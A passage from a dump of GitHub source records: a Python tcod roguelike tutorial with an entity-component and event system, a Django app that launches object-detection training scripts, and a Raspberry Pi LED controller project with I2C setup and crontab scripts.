"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\n\nfrom collections import defaultdict\nfrom collections import deque\n\nclass Event:\n @classmethod\n def get_id(cls):\n return cls.__name__\n @classmethod\n def is_instance(cls, inst):\n return isinstance(inst, cls)\n \nclass EventHandler:\n def recv_event(self, event):\n pass\n \nclass EventSystem(ecs.System):\n def __init__(self):\n ecs.System.__init__(self)\n self.event_handlers = defaultdict(list)\n self.event_queue = deque()\n\n def add_event_handler(self, event_cls, event_handler):\n event_id = event_cls.get_id()\n self.event_handlers[event_id].append(event_handler)\n \n def send_event(self, event):\n event_id = event.get_id()\n for event_handler in self.event_handlers[event_id]:\n event_handler.recv_event(event)\n\n def post_event(self, event):\n self.event_queue.append(event)\n\n def update(self):\n while self.event_queue:\n event = self.event_queue.pop()\n self.send_event(event)\n"
},
{
"alpha_fraction": 0.6777547001838684,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 35.92307662963867,
"blob_id": "4a33e42eaeb086e4c4825ec6d15eb09327d62392",
"content_id": "29b6ef38e87eb8a4e823a834d1f64c5def8ea467",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 13,
"path": "/example01.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import tcod\ntcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\ntcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\ntcod.sys_set_fps(30)\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, 40, 30, '@', tcod.BKGND_NONE)\n tcod.console_flush()\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n break\n\n"
},
{
"alpha_fraction": 0.6299517154693604,
"alphanum_fraction": 0.6338164210319519,
"avg_line_length": 29.41176414489746,
"blob_id": "873a8ff1123034115546e96d9b219a8221c44d4f",
"content_id": "8a33e85f0ffc837a504b9b4d677a0e4ed9d1190d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1035,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 34,
"path": "/cli.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport os\nimport urllib.request\n\ndef download_file(local_file_path, remote_file_path):\n if os.path.isfile(local_file_path):\n logging.debug(f\"found_local_file:{local_file_path}\")\n else:\n logging.debug(f\"download_remote_file:{remote_file_path}\")\n file_data = urllib.request.urlopen(remote_file_path).read()\n\n local_dir_path = os.path.dirname(local_file_path)\n if not os.path.isdir(local_file_path):\n logging.debug(f\"make_local_dir:{local_dir_path}\")\n os.makedirs(local_dir_path)\n\n logging.debug(f\"save_local_file:{local_file_path}\")\n open(local_file_path, 'wb').write(file_data)\n\nif __name__ == '__main__':\n import click\n \n @click.group()\n def cli(): pass\n\n @cli.command()\n def prepare():\n download_file(\n remote_file_path='https://github.com/libtcod/python-tcod/raw/master/fonts/libtcod/arial10x10.png',\n local_file_path='fonts/font.png')\n\n logging.basicConfig(level=logging.DEBUG)\n cli()\n\n"
},
{
"alpha_fraction": 0.550939679145813,
"alphanum_fraction": 0.5526705980300903,
"avg_line_length": 27.518247604370117,
"blob_id": "c513b07da9861dfe321b0f2a6f0e247f6659fb57",
"content_id": "c385bfd722c9db339f8b7c2fee1b3f8e7733bd28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4044,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 137,
"path": "/mdb.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import inspect\r\n\r\nclass FieldType:\r\n __seq = 0\r\n\r\n @classmethod\r\n def alloc_sequence(cls):\r\n cls.__seq += 1\r\n return cls.__seq\r\n\r\n def __init__(self, type_default, count=None, pk=False, fk=None, default=None):\r\n self._seq = FieldType.alloc_sequence()\r\n self._count = count\r\n self._pk = pk\r\n self._fk = fk\r\n self._default_value = type_default if default is None else default\r\n self._name = None\r\n self._parent_cls = None\r\n\r\n def bind(self, parent_cls, name):\r\n self._parent_cls = parent_cls\r\n self._name = name\r\n\r\n def __repr__(self):\r\n return self._parent_cls.__name__ + '.' + self._name\r\n\r\n @property\r\n def name(self):\r\n return self._name\r\n\r\n @property\r\n def default_value(self):\r\n return self._default_value\r\n\r\n @property\r\n def foreign_key(self):\r\n return self._fk\r\n\r\n @property\r\n def is_primary_key(self):\r\n return self._pk\r\n\r\n\r\nclass Integer(FieldType):\r\n def __init__(self, *args, **kwargs):\r\n FieldType.__init__(self, 0, *args, **kwargs)\r\n \r\nclass String(FieldType):\r\n def __init__(self, *args, **kwargs):\r\n FieldType.__init__(self, \"\", *args, **kwargs)\r\n\r\nclass DeclMeta(type):\r\n def __new__(meta, cls_name, bases, cls_dict):\r\n new_cls = type.__new__(meta, cls_name, bases, cls_dict)\r\n\r\n field_pairs = inspect.getmembers(new_cls, lambda m:isinstance(m, FieldType))\r\n for field_name, field_type in field_pairs:\r\n field_type.bind(new_cls, field_name)\r\n\r\n if field_pairs:\r\n field_pairs.sort(key=lambda x: x[1]._seq)\r\n new_cls._field_names, new_cls._field_types = list(zip(*field_pairs))\r\n else:\r\n new_cls._field_names = []\r\n new_cls._field_types = []\r\n\r\n new_cls._pk_names = [field_type.name for field_type in new_cls._field_types if field_type.is_primary_key]\r\n\r\n return new_cls\r\n\r\nclass Base(metaclass=DeclMeta):\r\n __records = list()\r\n __pk_records = dict()\r\n __repr_limit = 3\r\n\r\n @classmethod\r\n def get_field_names(cls):\r\n return cls._field_names\r\n\r\n @classmethod\r\n def get_primary_key_names(cls):\r\n return cls._pk_names\r\n\r\n @classmethod\r\n def get_field_types(cls):\r\n return cls._field_types\r\n\r\n def __init__(self, *args, **kwargs):\r\n for name, value in zip(self._field_names, args):\r\n setattr(self, name, value)\r\n\r\n for field_type in self._field_types[len(args):]:\r\n setattr(self, field_type.name, kwargs.get(field_type.name, field_type.default_value))\r\n\r\n def __repr__(self):\r\n name = self.__class__.__name__\r\n info = ' '.join(f\"{key}={value}\" for key, value in self.gen_field_pairs(limit=self.__repr_limit))\r\n return f\"<{name} {info}>\"\r\n\r\n @classmethod\r\n def load_datas(cls, datas):\r\n cls.__records = [cls(*data) for data in datas]\r\n if cls._pk_names:\r\n cls.__pk_records = dict((record.get_primary_key_values(), record) for record in cls.__records)\r\n\r\n @classmethod\r\n def get(cls, pk):\r\n assert(cls.__pk_records)\r\n return cls.__pk_records[pk]\r\n\r\n def gen_field_pairs(self, limit=None):\r\n if limit is None:\r\n for name in self._field_names:\r\n yield (name, getattr(self, name))\r\n else:\r\n for name in self._field_names[:limit]:\r\n yield (name, getattr(self, name))\r\n\r\n def get_primary_key_values(self):\r\n assert(self._pk_names)\r\n if len(self._pk_names) == 1:\r\n return getattr(self, self._pk_names[0])\r\n else:\r\n return tuple(getattr(self, name) for name in self._pk_names)\r\n\r\n\r\nif __name__ == '__main__':\r\n class User(Base):\r\n id = Integer(pk=True)\r\n name = String()\r\n\r\n class Profile(Base):\r\n id = Integer(pk=True)\r\n user_id = Integer(fk=User.id)\r\n\r\n print(list(User(name=\"haha\").gen_field_pairs()))\r\n print(Profile.user_id.foreign_key)\r\n"
},
{
"alpha_fraction": 0.6153362393379211,
"alphanum_fraction": 0.6231929659843445,
"avg_line_length": 29.00943374633789,
"blob_id": "9797be15f25db4133ae44f9a22c17a00502a0d49",
"content_id": "a02368275336a9de9a724a737ccb95451fcb12dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3182,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 106,
"path": "/example04.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\nimport evs\n\nclass CharacterProto(mdb.Base):\n pid = mdb.Integer(pk=True)\n shape = mdb.String()\n\nclass CharacterComponent(ecs.Component):\n char_pid = mdb.Integer()\n x = mdb.Integer()\n y = mdb.Integer()\n\n def __init__(self, *args, **kwargs):\n ecs.Component.__init__(self, *args, **kwargs)\n self.char_proto = CharacterProto.get(self.char_pid)\n\nclass AppClosingEvent(evs.Event):\n pass\n\nclass PlayerMovingEvent(evs.Event):\n def __init__(self, dx, dy):\n self.dx = dx \n self.dy = dy\n\nclass ControlSystem(ecs.System, evs.EventHandler):\n def start(self):\n event_system = evs.EventSystem.get()\n event_system.add_event_handler(PlayerMovingEvent, self)\n event_system.add_event_handler(AppClosingEvent, self)\n\n def set_player_eid(self, eid):\n self.player_eid = eid\n\n def recv_event(self, event):\n if PlayerMovingEvent.is_instance(event):\n comp = self.world.get_entity_component(self.player_eid, CharacterComponent)\n comp.x += event.dx\n comp.y += event.dy\n elif AppClosingEvent.is_instance(event):\n self.world.kill()\n \nimport tcod\n\nclass InputSystem(ecs.System):\n vk_events = {\n tcod.KEY_ESCAPE: AppClosingEvent(),\n tcod.KEY_UP: PlayerMovingEvent(0, -1),\n tcod.KEY_DOWN: PlayerMovingEvent(0, +1),\n tcod.KEY_LEFT: PlayerMovingEvent(-1, 0),\n tcod.KEY_RIGHT: PlayerMovingEvent(+1, 0),\n }\n\n def update(self):\n event_system = evs.EventSystem.get()\n if tcod.console_is_window_closed():\n event_system.send_event(AppClosingEvent())\n return\n\n key = tcod.console_check_for_keypress()\n event = self.vk_events.get(key.vk)\n if event:\n event_system.send_event(event)\n\n\nclass RenderSystem(ecs.System):\n def __init__(self, *args, **kwargs):\n ecs.System.__init__(self, *args, **kwargs)\n\n tcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\n tcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\n tcod.sys_set_fps(30)\n\n def update(self):\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, comp.char_proto.shape, tcod.BKGND_NONE)\n\n tcod.console_flush()\n\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, ' ', tcod.BKGND_NONE)\n\n\nif __name__ == '__main__':\n CharacterProto.load_datas([\n (1, '@'),\n (2, 'm'),\n ])\n\n world = ecs.World()\n world.add_system(evs.EventSystem.get())\n world.add_system(InputSystem.get())\n world.add_system(ControlSystem.get())\n world.add_system(RenderSystem.get())\n world.start()\n\n entity = world.create_entity(CharacterComponent(1, 40, 30))\n ControlSystem.get().set_player_eid(entity.get_id())\n\n while world.update():\n pass\n\n world.destroy_entity(entity.get_id())\n world.stop()\n\n"
},
{
"alpha_fraction": 0.5825492143630981,
"alphanum_fraction": 0.5915312170982361,
"avg_line_length": 27.851852416992188,
"blob_id": "7666462704a90d399497e3471d1b5642fcd5da0b",
"content_id": "4900a0a7062cba4556ef832cfa06ce05e12a0787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2338,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 81,
"path": "/example03.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\n\nclass CharacterProto(mdb.Base):\n pid = mdb.Integer(pk=True)\n shape = mdb.String()\n\nclass CharacterComponent(ecs.Component):\n char_pid = mdb.Integer()\n x = mdb.Integer()\n y = mdb.Integer()\n\n def __init__(self, *args, **kwargs):\n ecs.Component.__init__(self, *args, **kwargs)\n self.char_proto = CharacterProto.get(self.char_pid)\n\nimport tcod\n\nclass ControlSystem(ecs.System):\n def __init__(self, entity_id):\n ecs.System.__init__(self)\n self.player_eid = entity_id\n\n def update(self):\n if tcod.console_is_window_closed():\n self.world.kill()\n return\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n self.world.kill()\n return\n\n comp = world.get_entity_component(self.player_eid, CharacterComponent)\n if key.vk == tcod.KEY_UP:\n comp.y -= 1\n elif key.vk == tcod.KEY_DOWN:\n comp.y += 1\n elif key.vk == tcod.KEY_LEFT:\n comp.x -= 1\n elif key.vk == tcod.KEY_RIGHT:\n comp.x += 1\n\n\nclass RenderSystem(ecs.System):\n def __init__(self, *args, **kwargs):\n ecs.System.__init__(self, *args, **kwargs)\n\n tcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\n tcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\n tcod.sys_set_fps(30)\n\n def update(self):\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, comp.char_proto.shape, tcod.BKGND_NONE)\n\n tcod.console_flush()\n\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, ' ', tcod.BKGND_NONE)\n\n\nif __name__ == '__main__':\n CharacterProto.load_datas([\n (1, '@'),\n (2, 'm'),\n ])\n\n world = ecs.World()\n entity = world.create_entity(CharacterComponent(1, 40, 30))\n world.add_system(ControlSystem(entity.get_id()))\n world.add_system(RenderSystem())\n world.start()\n\n while world.update():\n pass\n\n world.destroy_entity(entity.get_id())\n world.stop()\n\n"
},
{
"alpha_fraction": 0.5761553049087524,
"alphanum_fraction": 0.5772491097450256,
"avg_line_length": 24.496503829956055,
"blob_id": "d39faa1349103eb3a3cab44a5f22aeea8229f323",
"content_id": "039caaf421ade61b770d1b7eb55b7c88f36c7801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3657,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 143,
"path": "/ecs.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\n\nfrom weakref import ref\n\nfrom collections import OrderedDict\nfrom collections import defaultdict\n\nclass SeqMeta(mdb.DeclMeta):\n __seq = 0\n\n @classmethod\n def alloc_sequence(meta):\n meta.__seq += 1\n return meta.__seq\n\n def __new__(meta, cls_name, bases, cls_dict):\n new_cls = mdb.DeclMeta.__new__(meta, cls_name, bases, cls_dict)\n new_cls._seq = meta.alloc_sequence()\n return new_cls\n\nclass Component(metaclass=SeqMeta):\n @classmethod\n def get_sequence(cls):\n return cls._seq\n\n def __init__(self, *args, **kwargs):\n for name, value in zip(self._field_names, args):\n setattr(self, name, value)\n\n for field_type in self._field_types[len(args):]:\n setattr(self, field_type.name, kwargs.get(field_type.name, field_type.default_value))\n\n def __repr__(self):\n name = self.__class__.__name__\n info = ' '.join(f\"{key}={value}\" for key, value in self.gen_field_pairs(limit=self.__repr_limit))\n return f\"<{name} {info}>\"\n\nclass Entity:\n def __init__(self, id, comps):\n self.id = id\n self.comps = dict((comp.get_sequence(), comp) for comp in comps)\n\n def get_component_sequences(self):\n return self.comps.keys()\n\n def get_id(self):\n return self.id\n\nclass System:\n _inst = None\n\n @classmethod\n def get(cls):\n if not cls._inst:\n cls._inst = cls()\n return cls._inst\n\n def __init__(self):\n self.world = None\n\n def bind(self, world):\n self.world = world\n\n def start(self):\n return True\n\n def stop(self):\n return\n\n def update(self):\n pass\n\nclass World:\n def __init__(self):\n self.is_alive = True\n self.next_entity_id = 0\n self.entities = OrderedDict()\n self.components = defaultdict(dict)\n self.systems = []\n\n def create_entity(self, *comps):\n self.next_entity_id += 1\n\n new_entity_id = self.next_entity_id\n new_entity = Entity(new_entity_id, comps)\n self.entities[new_entity_id] = new_entity\n\n for comp in comps:\n comp_seq = comp.get_sequence()\n self.components[comp.get_sequence()][new_entity_id] = comp\n\n return new_entity\n\n def destroy_entity(self, del_entity_id):\n del_entity = self.entities.get(del_entity_id)\n if del_entity:\n for comp_seq in del_entity.get_component_sequences():\n del self.components[comp_seq][del_entity_id] \n \n del self.entities[del_entity_id]\n \n def get_entity_pairs(self):\n return self.entities.items()\n\n def get_entity_component(self, entity_id, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq][entity_id]\n\n def get_component_pairs(self, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq].items()\n\n def get_components(self, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq].values()\n\n def add_system(self, system):\n system.bind(self)\n self.systems.append(system)\n return system\n\n def start(self):\n for system in self.systems:\n if not system.start():\n return False\n\n return True\n\n def stop(self):\n for system in self.systems:\n system.stop()\n\n def update(self):\n if not self.is_alive:\n return False\n\n for system in self.systems:\n system.update()\n\n return True\n\n def kill(self):\n self.is_alive = False\n\n \n\n"
},
{
"alpha_fraction": 0.5978552103042603,
"alphanum_fraction": 0.6206434369087219,
"avg_line_length": 28.799999237060547,
"blob_id": "d3776a4ccccfa9edde38cf4f8011cccafdddb3f4",
"content_id": "5c4ef54047c21d0dd5d3e8181cf32eaf36ca6bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 25,
"path": "/example02.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import tcod\ntcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\ntcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\ntcod.sys_set_fps(30)\n\nx = 40\ny = 30\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, x, y, '@', tcod.BKGND_NONE)\n tcod.console_flush()\n tcod.console_put_char(0, x, y, ' ', tcod.BKGND_NONE)\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n break\n elif key.vk == tcod.KEY_UP:\n y -= 1\n elif key.vk == tcod.KEY_DOWN:\n y += 1\n elif key.vk == tcod.KEY_LEFT:\n x -= 1\n elif key.vk == tcod.KEY_RIGHT:\n x += 1\n\n"
}
] | 8 |
alice-mimiko/git_test
|
https://github.com/alice-mimiko/git_test
|
0038842cd9159e465c9538b959fc08c7e9038efe
|
a992a3a65f349079607004ce030e3fadb952eef8
|
84a002177f6ff8d3391faefffe9afdb0d8295213
|
refs/heads/main
| 2023-01-07T09:51:32.336519 | 2020-11-12T12:56:54 | 2020-11-12T12:56:54 | 312,271,381 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3529411852359772,
"alphanum_fraction": 0.529411792755127,
"avg_line_length": 5.800000190734863,
"blob_id": "61152303c9c3196f532454e22e5faed9dece9f3d",
"content_id": "32ffdf006b2e6730f93f22b61350b098eeb56303",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 5,
"path": "/login.py",
"repo_name": "alice-mimiko/git_test",
"src_encoding": "UTF-8",
"text": "num = 100\n\nnum = 200\n\nnum = 'new'\n"
}
] | 1 |
achimwinter/openhab-config
|
https://github.com/achimwinter/openhab-config
|
4369e5cfa9ecfef6ed01b9b1c11ddc0aa865d69e
|
64a1f4f4b737c20be2dac97bba3312d2b571cc6c
|
02ba77dc4b4e172fba863c1045959d5ffe713eae
|
refs/heads/master
| 2020-03-24T11:45:33.622910 | 2018-09-30T09:24:22 | 2018-09-30T09:24:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.639053225517273,
"alphanum_fraction": 0.6952662467956543,
"avg_line_length": 26.16666603088379,
"blob_id": "f5df08e3c8631414a7dff99504ef2596210072d2",
"content_id": "5176db879ca4757844875c420c1cc99dddc89b91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 12,
"path": "/scripts/Puffer_RecUnt.py",
"repo_name": "achimwinter/openhab-config",
"src_encoding": "UTF-8",
"text": "import urllib3\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nhttp = urllib3.PoolManager()\r\nurl = 'http://192.168.2.112:8083/fhem/floorplan/Pufferspeicher'\r\nresponse = http.request(\"GET\", url)\r\n\r\nsoup = BeautifulSoup(response.data, \"html.parser\")\r\nname_box = soup.find(\"div\", attrs={\"id\": \"recunt\"})\r\nname = name_box.text.strip()[3:5]\r\nprint(name)\r\n"
},
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 25,
"blob_id": "6ca1e726a31bf9ff4698f4bb81b1a028ca71d39b",
"content_id": "e09eb7b640b8025327acf05a99bed9cff889f904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/README.md",
"repo_name": "achimwinter/openhab-config",
"src_encoding": "UTF-8",
"text": "# openhab-config\nMeine Config für mein \"Smart Home\"\n"
}
] | 2 |
Gaurav561/object_detection
|
https://github.com/Gaurav561/object_detection
|
54b48e4262976f781b62668ce92c5718494366d5
|
52206fe8667ba1e8eba2bb8e02596de77f1209bc
|
40f3b107ed9f5538e8ef83bd61aecb2045a1a600
|
refs/heads/main
| 2023-06-10T18:58:14.840842 | 2021-07-01T12:53:33 | 2021-07-01T12:53:33 | 382,029,679 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7104136943817139,
"alphanum_fraction": 0.7275320887565613,
"avg_line_length": 48.07143020629883,
"blob_id": "27a9406bc048b078bff376bc903efd3332407fb7",
"content_id": "9729ed388ef73ccc5bf05d33349fb59b87999fc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 701,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 14,
"path": "/customAI/views.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\r\nimport os\r\n\r\n# Create your views here.\r\ndef index(request):\r\n return render(request , \"main.html\")\r\n\r\ndef create_data(request):\r\n os.system(\"python dataset_extraction.py\")\r\n os.system(\"python dataset_extraction1.py\")\r\n os.system(\"python generate_tfrecord.py --csv_input=train_labels.csv --image_dir=images/train --output_path=train.record\")\r\n os.system(\"python generate_tfrecord.py --csv_input=test_labels.csv --image_dir=images/test --output_path=test.record\")\r\n os.system(\"python model_main_tf2.py --model_dir=training/ --pipeline_config_path=training/ssd_efficientdet_d0_512x512_coco17_tpu-8.config\")\r\n return render(request,\"index.html\")\r\n"
},
{
"alpha_fraction": 0.8295454382896423,
"alphanum_fraction": 0.8295454382896423,
"avg_line_length": 43,
"blob_id": "7432f796e1b208e9c3592500057d35dc7d8b1e96",
"content_id": "0313c47a7cc9295728839a7f3350deb34540675f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "# object_detection\nA simple webapp to train object detection model without any headache\n"
},
{
"alpha_fraction": 0.6635071039199829,
"alphanum_fraction": 0.6635071039199829,
"avg_line_length": 24.375,
"blob_id": "bb2a8c317878a44e0d6b39e54c60e6b0ec70a3ab",
"content_id": "ec60d46f9f545837a0fb35805251df5e34595d9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/customAI/urls.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\r\nfrom django.urls import include,path\r\nfrom . import views\r\nurlpatterns = [\r\n\r\n path('', views.index , name='index'),\r\n path('dataset/', views.create_data , name='db')\r\n]\r\n"
},
{
"alpha_fraction": 0.7303522825241089,
"alphanum_fraction": 0.7682926654815674,
"avg_line_length": 80,
"blob_id": "b3d4322ef1dff60497adb2adb877d2d13b15c4e8",
"content_id": "36917cfb21c9f77e146a2a4864289937fc2f03e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 250,
"num_lines": 9,
"path": "/run_model.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "import os\r\n\r\n\r\nos.system(\"python dataset_extraction.py\")\r\nos.system(\"python dataset_extraction1.py\")\r\nos.system(\"python generate_tfrecord.py --csv_input=train_labels.csv --image_dir=images/train --output_path=train.record\")\r\nos.system(\"python generate_tfrecord.py --csv_input=test_labels.csv --image_dir=images/test --output_path=test.record\")\r\nos.system(\"python model_main_tf2.py --model_dir=training/ --pipeline_config_path=training/ssd_efficientdet_d0_512x512_coco17_tpu-8.config\")\r\nos.system(\"python .\\exporter_main_v2.py --input_type image_tensor --pipeline_config_path training\\ssd_efficientdet_d0_512x512_coco17_tpu-8.config --trained_checkpoint_dir .\\efficientdet_d0_coco17_tpu-32 --output_directory .\\exported-models\\my_model\")\r\n"
}
] | 4 |
honzasram/LED-RPi-controler
|
https://github.com/honzasram/LED-RPi-controler
|
ef95aac7d589af295fab13e721c3d7974e2d0d81
|
6f155d67d787921c5233f274bfc33ebfd1519c83
|
8ff6fcd63b89e6c0e4b0ffde75dd02edfadc815e
|
refs/heads/master
| 2021-03-16T09:55:24.634780 | 2014-10-12T13:26:02 | 2014-10-12T13:26:02 | 25,084,820 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7447916865348816,
"alphanum_fraction": 0.7621527910232544,
"avg_line_length": 43.30769348144531,
"blob_id": "99c92340f5cb66c9779a0b0c4e1c1e3506f0a397",
"content_id": "91a87daa552f83c4ac922cd0c1cf9fb101eed5a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 576,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 13,
"path": "/README.md",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "LED-RPi-controler\n=================\n\nSoftware and desctription of hardware for project. \n\nBrain of this project is Raspberry Pi. To this simple piece of computer is connected module for PWM and to that is attached some transistors for controlling RGB LED strips.\nThat is only HW. All is controlled by user via interface. IT is based on web but also it can be some buttons. It depends on you and you style.\n\nWhat is needed:\n\nyou have to use Adafruit 16-Channel 12-bit PWM/Servo Driver - I2C interface - PCA9685\n\nalso it is needed to have installed i2c-tools, screen and python\n"
},
{
"alpha_fraction": 0.6153846383094788,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 12,
"blob_id": "d37142cf5d4d19bb0bc13520352f4534ebb6b260",
"content_id": "2aa2443baeee32cdf26ccadd99a10198d5a7cb2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13,
"license_type": "no_license",
"max_line_length": 12,
"num_lines": 1,
"path": "/SW/ServerSide/C-language/program.cpp",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "//to be done\n"
},
{
"alpha_fraction": 0.7028571367263794,
"alphanum_fraction": 0.7219047546386719,
"avg_line_length": 29.882352828979492,
"blob_id": "c0226f5b6676451304577ffdb9351c9e8050e4a3",
"content_id": "97543d494213a8e301fcdbe1b4935b419ae2d57f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 17,
"path": "/SW/Settings/raspiNeeds.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#this is script which will prepare your RPi to work with module via I2C bus and also it will set up other things like web server, cron table, etc.\n\n\n\necho '# blacklist spi and i2c by default (many users dont need them)' > /etc/modprobe.d/raspi-blacklist.conf\necho 'blacklist spi-bcm2708' >> /etc/modprobe.d/raspi-blacklist.conf\necho 'i2c-dev' >> /etc/modules\n\nsudo apt-get update\nsudo apt-get install i2c-tool\n\n(sudo crontab -l; echo \"@reboot sleep 10 &&/home/pi/.run &\" ) | sudo crontab\n\ncp ./run ~/.run\n\nreboot\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.625,
"avg_line_length": 11,
"blob_id": "f47bd0e0b7f59703e27176488bf23d4752517612",
"content_id": "bf2dc537c2a663b31abd9d04ba2de65fd764536a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 24,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 2,
"path": "/setup.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#to be done\n"
},
{
"alpha_fraction": 0.6333333253860474,
"alphanum_fraction": 0.6333333253860474,
"avg_line_length": 21.25,
"blob_id": "fc4375da0b5f610cad43d6cd0929f5e1b5e437f4",
"content_id": "16a68003a9531b3a4229d7bea27adc0a8c37b829",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 4,
"path": "/run.sh",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nscreen -d -m /home/pi/PWM/Obj.py\n#screen -d -m /home/pi/.temp\n# to be edited \n"
},
{
"alpha_fraction": 0.4750049412250519,
"alphanum_fraction": 0.49871566891670227,
"avg_line_length": 27.74431800842285,
